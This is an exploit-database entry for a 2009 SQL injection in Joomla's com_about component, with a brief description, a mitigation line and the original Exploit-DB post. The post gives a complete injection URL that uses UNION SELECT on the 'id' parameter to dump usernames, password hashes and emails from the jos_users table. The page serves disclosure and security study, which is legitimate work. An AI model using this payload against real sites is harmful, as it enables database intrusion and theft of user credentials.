header-logo
Suggest Exploit
vendor:
Joomla
by:
Snakespc
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla com_about Remote Sql Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable Joomla application. The request contains a malicious SQL query in the 'id' parameter of the 'com_about' component. This can allow the attacker to extract information from the database, such as usernames, passwords, and emails.

Mitigation:

Developers should always use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

==============================================================================
[»] Joomla com_about Remote Sql Injection Vulnerability
==============================================================================
   
[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:s-c-dz@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ His0k4    sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
   
###########################################################################
 ===[ Exploit ]===
   
[»] http://server/index.php?option=com_about&task=view&id=-24+UNION SELECT 1,2,3,group_concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+jos_users--
[»]Author: Snakespc <-
###########################################################################